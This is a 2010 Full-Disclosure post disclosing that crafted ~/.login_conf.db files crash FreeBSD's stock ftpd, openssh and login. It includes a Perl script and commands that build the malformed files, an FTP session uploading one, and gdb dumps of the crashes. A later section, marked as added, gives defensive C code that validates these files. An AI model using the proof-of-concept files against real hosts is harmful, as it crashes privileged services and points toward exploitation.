Message-ID: <AANLkTimAB6K7JxoO6bTuPdKMQS7scEXBZLzHojgrJxRC@mail.gmail.com>
Date: Tue, 10 Aug 2010 04:11:46 +0200
From: "HI-TECH ." <isowarez.isowarez.isowarez@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: FreeBSD stock ftpd vulnerabilities (and more)
FreeBSD stock ftpd vulnerabilities (and more)
Currently this is crash only.
Also see the attachment.
More at @ http://isowarez.de/ lewls
Cheers /Kingcope
.login_conf.db vulnerabilities (FreeBSD Berkeley DB 1.85)
affects stock ftpd, openssh, /usr/bin/login
-----------------------------------------------------------
perl program to create the .db files and play with:
use strict;
use warnings;
use Fcntl;      # O_CREAT, O_TRUNC, O_RDWR
use DB_File;    # $DB_HASH; DB_File must be built against the libc db(3) 1.85
                # code so test.db comes out in the hash format .login_conf.db uses
my %hash;
my $db = tie %hash, 'DB_File', "test.db", O_CREAT | O_TRUNC | O_RDWR,
    0666, $DB_HASH or die "tie: $!";   # 0666 in place of DEFFILEMODE
my $big = "A" x 10100;   # value larger than one bucket: forces a big-key page chain
$db->put("test", $big);
$db->sync();
undef $db;
untie %hash;             # test.db can now be copied to ~/.login_conf.db and edited
------------------------------------------------------------------------------------------------------------------
one db file was created using OpenBSD like so:
perl -e 'print "me:\\\n:" . "A" x 100000 . "=" . "A:"' > .login_conf
then using vi put a tab before the :AAAA...A's after the me:\n
then do:
cap_mkdb .login_conf
you cannot use FreeBSD's cap_mkdb because it has a strcpy buffer overflow
when parsing this file; OpenBSD's does not :>
------------------------------------------------------------------------------------------------------------------
%uname -a;
FreeBSD r00tbox0wned.Belkin 6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16 04:18:52 UTC 2008 root@...sler.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
.login_conf_suspect.db
C:\Users\Niko>ftp 192.168.2.19
Connected to 192.168.2.19.
220 r00tbox0wned.Belkin FTP server (Version 6.00LS) ready.
User (192.168.2.19:(none)): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
ftp> bin
200 Type set to I.
ftp> put Desktop/.login_conf_suspect.db .login_conf.db
200 PORT command successful.
150 Opening BINARY mode data connection for '.login_conf.db'.
226 Transfer complete.
ftp: 180224 bytes sent in 0,04Seconds 4870,92Kbytes/sec.
ftp> quit
221 Goodbye.
C:\Users\Niko>ftp 192.168.2.19
Connected to 192.168.2.19.
220 r00tbox0wned.Belkin FTP server (Version 6.00LS) ready.
User (192.168.2.19:(none)): kcope
331 Password required for kcope.
Password:
Connection closed by remote host.
C:\Users\Niko>ftp 192.168.2.19
Connected to 192.168.2.19.
220 r00tbox0wned.Belkin FTP server (Version 6.00LS) ready.
User (192.168.2.19:(none)): kcope
331 Password required for kcope.
Password:
%gdb /usr/libexec/ftpd
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...
(gdb) attach 668
Attaching to program: /usr/libexec/ftpd, process 668
Reading symbols from /lib/libutil.so.5...done.
Loaded symbols for /lib/libutil.so.5
Reading symbols from /lib/libcrypt.so.3...done.
Loaded symbols for /lib/libcrypt.so.3
Reading symbols from /usr/lib/libopie.so.4...done.
Loaded symbols for /usr/lib/libopie.so.4
Reading symbols from /lib/libmd.so.3...done.
Loaded symbols for /lib/libmd.so.3
Reading symbols from /lib/libm.so.4...done.
Loaded symbols for /lib/libm.so.4
Reading symbols from /usr/lib/libpam.so.3...done.
Loaded symbols for /usr/lib/libpam.so.3
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /libexec/ld-elf.so.1...done.
Loaded symbols for /libexec/ld-elf.so.1
0x281a4b1d in read () at read.S:2
2 RSYSCALL(read)
Current language: auto; currently asm
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x28192463 in collect_data (hashp=0x8061400, bufp=0x805f400, len=44900,
set=0)
at /var/src/lib/libc/db/hash/hash_bigkey.c:492
492 xbp = __get_buf(hashp, bp[bp[0] - 1], bufp, 0);
Current language: auto; currently c
(gdb) i r
eax 0xffff 65535 < OUR VALUE
ecx 0x0 0
edx 0xffff1001 -61439
ebx 0x281b4960 672876896
esp 0xbfbfc228 0xbfbfc228
ebp 0xbfbfc258 0xbfbfc258
esi 0x8061400 134616064
edi 0x8088000 134774784
eip 0x28192463 0x28192463
eflags 0x10286 66182
cs 0x33 51
ss 0x3b 59
ds 0x3b 59
es 0x3b 59
fs 0x3b 59
gs 0x1b 27
(gdb)
(gdb) x/10i $eip
0x28192463 <collect_data+71>: movzwl 0xfffffffe(%edi,%eax,2),%eax
0x28192468 <collect_data+76>: push %eax
0x28192469 <collect_data+77>: push %esi
0x2819246a <collect_data+78>: call 0x2810007c <_init+148>
0x2819246f <collect_data+83>: add $0x10,%esp
0x28192472 <collect_data+86>: test %eax,%eax
0x28192474 <collect_data+88>: mov %eax,%edx
0x28192476 <collect_data+90>: je 0x28192594 <collect_data+376>
0x2819247c <collect_data+96>: sub $0x8,%esp
0x2819247f <collect_data+99>: pushl 0xc(%ebp)
(gdb)
(gdb) i f
Stack level 0, frame at 0xbfbfc260:
eip = 0x28192463 in collect_data
(/var/src/lib/libc/db/hash/hash_bigkey.c:492); saved eip 0x28192490
called by frame at 0xbfbfc2a0
source language c.
Arglist at 0xbfbfc258, args: hashp=0x8061400, bufp=0x805f400, len=44900,
set=0
Locals at 0xbfbfc258, Previous frame's sp is 0xbfbfc260
Saved registers:
ebx at 0xbfbfc24c, ebp at 0xbfbfc258, esi at 0xbfbfc250, edi at
0xbfbfc254,
eip at 0xbfbfc25c
(gdb)
---------------------------------------------------------------------------------------
__getbuf_crash_suspicious.db
%gdb /usr/libexec/ftpd
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...
(gdb) attach 680
Attaching to program: /usr/libexec/ftpd, process 680
Reading symbols from /lib/libutil.so.5...done.
Loaded symbols for /lib/libutil.so.5
Reading symbols from /lib/libcrypt.so.3...done.
Loaded symbols for /lib/libcrypt.so.3
Reading symbols from /usr/lib/libopie.so.4...done.
Loaded symbols for /usr/lib/libopie.so.4
Reading symbols from /lib/libmd.so.3...done.
Loaded symbols for /lib/libmd.so.3
Reading symbols from /lib/libm.so.4...done.
Loaded symbols for /lib/libm.so.4
Reading symbols from /usr/lib/libpam.so.3...done.
Loaded symbols for /usr/lib/libpam.so.3
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /libexec/ld-elf.so.1...done.
Loaded symbols for /libexec/ld-elf.so.1
0x281a4b1d in read () at read.S:2
2 RSYSCALL(read)
Current language: auto; currently asm
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
memcpy () at /var/src/lib/libc/i386/string/bcopy.S:79
79 rep
(gdb)
Program received signal SIGSEGV, Segmentation fault.
memcpy () at /var/src/lib/libc/i386/string/bcopy.S:79
79 rep
(gdb) i r
eax 0x5ff82 393090
ecx 0x3 3
edx 0x3 3
ebx 0x281b4960 672876896
esp 0xbfbfc544 0xbfbfc544
ebp 0xbfbfc578 0xbfbfc578
esi 0x28096348 671703880
edi 0x5ff82 393090
eip 0x281a436d 0x281a436d
eflags 0x10206 66054
cs 0x33 51
ss 0x3b 59
ds 0x3b 59
es 0x3b 59
fs 0x3b 59
gs 0x1b 27
(gdb)
(gdb) i f
Stack level 0, frame at 0xbfbfc550:
eip = 0x281a436d in memcpy (/var/src/lib/libc/i386/string/bcopy.S:79);
saved eip 0x281869fe
called by frame at 0xbfbfc580
source language asm.
Arglist at 0xbfbfc548, args:
Locals at 0xbfbfc548, Previous frame's sp is 0xbfbfc550
Saved registers:
esi at 0xbfbfc544, edi at 0xbfbfc540, eip at 0xbfbfc54c
(gdb)
(gdb) x/10i $eip
0x281a436d <memcpy+37>: repz movsb %ds:(%esi),%es:(%edi)
0x281a436f <memcpy+39>: pop %edi
0x281a4370 <memcpy+40>: pop %esi
0x281a4371 <memcpy+41>: ret
0x281a4372 <memcpy+42>: add %ecx,%edi
0x281a4374 <memcpy+44>: add %ecx,%esi
0x281a4376 <memcpy+46>: std
0x281a4377 <memcpy+47>: mov %ecx,%edx
0x281a4379 <memcpy+49>: and $0x3,%ecx
0x281a437c <memcpy+52>: dec %edi
(gdb)
---------------------------------------------------------------------------------------
cgetent_crash_suspicious.db
looks like this is outside of the Berkeley DB 1.85 code.
localhost# uname -a;
FreeBSD localhost.Belkin 4.9-RELEASE FreeBSD 4.9-RELEASE #0: Mon Oct 27 17:51:09 GMT 2003 root@...ebsd-stable.sentex.ca:/usr/obj/usr/src/sys/GENERIC i386
doesn't work on 6.3
localhost# ps aux | grep ftpd
root 161 0.0 0.3 1016 344 p0 R+ 9:04PM 0:00.01 grep ftpd
root 150 0.0 0.9 1420 1088 ?? Is 9:03PM 0:00.02 ftpd: 192.168.2.15
localhost# gdb /usr/libexec/ftpd
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
(gdb) attach 150
Attaching to program: /usr/libexec/ftpd, process 150
Reading symbols from /usr/lib/libskey.so.2...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libmd.so.2...(no debugging symbols
found)...done.
Reading symbols from /usr/lib/libcrypt.so.2...(no debugging symbols
found)...
done.
Reading symbols from /usr/lib/libutil.so.3...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libm.so.2...(no debugging symbols
found)...done.
Reading symbols from /usr/lib/libpam.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libc.so.4...(no debugging symbols
found)...done.
Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols
found)...
done.
0x28146c44 in read () from /usr/lib/libc.so.4
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x2810da81 in cgetent () from /usr/lib/libc.so.4
(gdb) i r
eax 0x0 0
ecx 0xfffffff3 -13
edx 0x807cff4 134729716
ebx 0x281522ec 672473836
esp 0xbfbfdf08 0xbfbfdf08
ebp 0xbfbfe480 0xbfbfe480
esi 0xbfbfe380 -1077943424
edi 0x807d000 134729728
eip 0x2810da81 0x2810da81
eflags 0x10246 66118
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb) x/10i $eip
0x2810da81 <cgetent+513>: repnz scas %es:(%edi),%al
0x2810da83 <cgetent+515>: mov %ecx,%esi
0x2810da85 <cgetent+517>: not %esi
0x2810da87 <cgetent+519>: lea 0xffffffff(%esi),%edx
0x2810da8a <cgetent+522>: mov %edx,0xfffffad4(%ebp)
0x2810da90 <cgetent+528>: add $0xfffffff4,%esp
0x2810da93 <cgetent+531>: push %esi
0x2810da94 <cgetent+532>: call 0x280dd8a4 <_init+2316>
0x2810da99 <cgetent+537>: mov %eax,%edi
0x2810da9b <cgetent+539>: add $0xfffffffc,%esp
(gdb)
(gdb) i f
Stack level 0, frame at 0xbfbfe480:
eip = 0x2810da81 in cgetent; saved eip 0x2810d8ae
called by frame at 0xbfbfe4c0
Arglist at 0xbfbfe480, args:
Locals at 0xbfbfe480, Previous frame's sp is 0x0
Saved registers:
ebx at 0xbfbfe468, ebp at 0xbfbfe480, eip at 0xbfbfe484
(gdb)
I am sure there are more places where it might crash. Just modify the values of the .db files in a hex editor and check it out.
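Added example, not part of Kingcope's post and not code from the FreeBSD tree: a small C program that checks the on-disk header of a Berkeley DB 1.85 hash file (the format .login_conf.db is in) for the inconsistencies a hex-edited file introduces, and a bounds-checked form of the page-index read that faults in collect_data() at hash_bigkey.c:492 above. The header layout follows HASHHDR in lib/libc/db/hash/hash.h, the page layout follows the u_int16_t offset array in hash/page.h, and the file is assumed little-endian (lorder 1234, the i386 case in the dumps). The sample header and page bytes are constructed here, not dumped from a real file; the file length checks are necessary conditions only and will not catch every corruption.

```c
/*
 * Sanity checks for a Berkeley DB 1.85 hash file header plus a bounds-checked
 * version of the bp[bp[0] - 1] read from hash_bigkey.c.  Added example, not
 * FreeBSD code.  Assumes little-endian files (lorder 1234).
 * Build: cc -std=c99 -Wall db185chk.c
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HASHMAGIC   0x061561
#define HASHVERSION 2
#define NCACHED     32
#define HDR_SIZE    (17 * 4 + NCACHED * 4 + NCACHED * 2)   /* 260 bytes */

/* byte offsets of the 32-bit HASHHDR fields used below */
enum { F_MAGIC = 0, F_VERSION = 4, F_LORDER = 8, F_BSIZE = 12, F_BSHIFT = 16,
       F_SSIZE = 24, F_SSHIFT = 28, F_MAXBUCKET = 40, F_HIGHMASK = 44,
       F_LOWMASK = 48, F_HDRPAGES = 60 };

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/*
 * Returns NULL when the header fields that drive later indexing are
 * self-consistent, otherwise a short reason.  hash_open() verifies magic,
 * version and the hash-function check value, then trusts the rest.
 */
const char *hdr_check(const uint8_t *buf, size_t len)
{
    if (len < HDR_SIZE)                        return "file shorter than header";
    if (rd32(buf + F_MAGIC) != HASHMAGIC)      return "bad magic";
    if (rd32(buf + F_VERSION) != HASHVERSION)  return "bad version";
    if (rd32(buf + F_LORDER) != 1234)          return "not little-endian";
    uint32_t bsize = rd32(buf + F_BSIZE), bshift = rd32(buf + F_BSHIFT);
    /* in-page offsets are u_int16_t, so a bucket can never exceed 64 KiB */
    if (bsize < 64 || bsize > 65536 || (bsize & (bsize - 1)))
        return "bsize not a power of two in 64..65536";
    if (bshift > 31 || (1u << bshift) != bsize)
        return "bshift does not match bsize";
    uint32_t hdrpages = rd32(buf + F_HDRPAGES);
    if (hdrpages == 0 || hdrpages > len / bsize)
        return "hdrpages past end of file";
    uint32_t maxb = rd32(buf + F_MAXBUCKET);
    uint32_t hm = rd32(buf + F_HIGHMASK), lm = rd32(buf + F_LOWMASK);
    /* masks are of the form 2^k-1, low <= high, and every bucket id <= high_mask */
    if ((hm & (hm + 1)) || (lm & (lm + 1)) || lm > hm || maxb > hm)
        return "inconsistent bucket masks";
    /* bucket B lives at page >= hdrpages + B, so the file must reach that far */
    if (((uint64_t)hdrpages + maxb + 1) * bsize > len)
        return "max_bucket past end of file";
    return NULL;
}

/*
 * Bounds-checked form of the read at hash_bigkey.c:492.  bp[0] is the item
 * count of a page and bp[bp[0] - 1] the next page of a big-key chain; a
 * well-formed page keeps bp[0 .. bp[0] + 2] inside the bsize-byte page.
 * libc uses bp[0] straight from disk: with bp[0] = 0xffff (the eax in the
 * dump) the index lands about 128 KiB past a 4 KiB page.
 */
bool page_next_ovfl(const uint8_t *page, uint32_t bsize, uint16_t *next)
{
    uint32_t n = (uint32_t)page[0] | (uint32_t)page[1] << 8;   /* bp[0] */
    if (n < 2 || (n + 3) * 2 > bsize)
        return false;
    size_t i = (size_t)(n - 1) * 2;
    *next = (uint16_t)(page[i] | page[i + 1] << 8);
    return true;
}

/* Constructed sample header: 4 KiB buckets, one header page, two buckets. */
void build_sample_hdr(uint8_t *buf, size_t len)
{
    memset(buf, 0, len);
    wr32(buf + F_MAGIC, HASHMAGIC);
    wr32(buf + F_VERSION, HASHVERSION);
    wr32(buf + F_LORDER, 1234);
    wr32(buf + F_BSIZE, 4096);
    wr32(buf + F_BSHIFT, 12);
    wr32(buf + F_SSIZE, 256);
    wr32(buf + F_SSHIFT, 8);
    wr32(buf + F_MAXBUCKET, 1);
    wr32(buf + F_HIGHMASK, 3);
    wr32(buf + F_LOWMASK, 1);
    wr32(buf + F_HDRPAGES, 1);
}

int main(void)
{
    static uint8_t file[3 * 4096];   /* header page + buckets 0 and 1 */
    uint8_t page[4096] = {0};
    uint16_t next = 0;

    build_sample_hdr(file, sizeof file);
    printf("clean header: %s\n", hdr_check(file, sizeof file) ? "REJECT" : "ok");

    /* the hex-editor tweaks the post suggests: corrupt bsize, then max_bucket */
    wr32(file + F_BSIZE, 0);
    printf("bsize=0: %s\n", hdr_check(file, sizeof file));
    wr32(file + F_BSIZE, 4096);
    wr32(file + F_MAXBUCKET, 0x7fffffff);
    printf("max_bucket=0x7fffffff: %s\n", hdr_check(file, sizeof file));

    page[0] = 2; page[2] = 0x34; page[3] = 0x12;        /* bp[0]=2, bp[1]=0x1234 */
    printf("good page: %s, next page %u\n",
           page_next_ovfl(page, 4096, &next) ? "ok" : "REJECT", next);
    page[0] = 0xff; page[1] = 0xff;                     /* bp[0]=0xffff, as in the crash */
    printf("bp[0]=0xffff: %s\n", page_next_ovfl(page, 4096, &next) ? "ok" : "REJECT");
    return 0;
}
```

Reading a real ~/.login_conf.db into the buffer is an fread() away; the point of the two functions is that every value the library later uses as an index or a size comes from a file the user controls, so a reader in a privileged process (ftpd, sshd, login) has to bound it before use, which the 1.85 code on the page does not.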
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/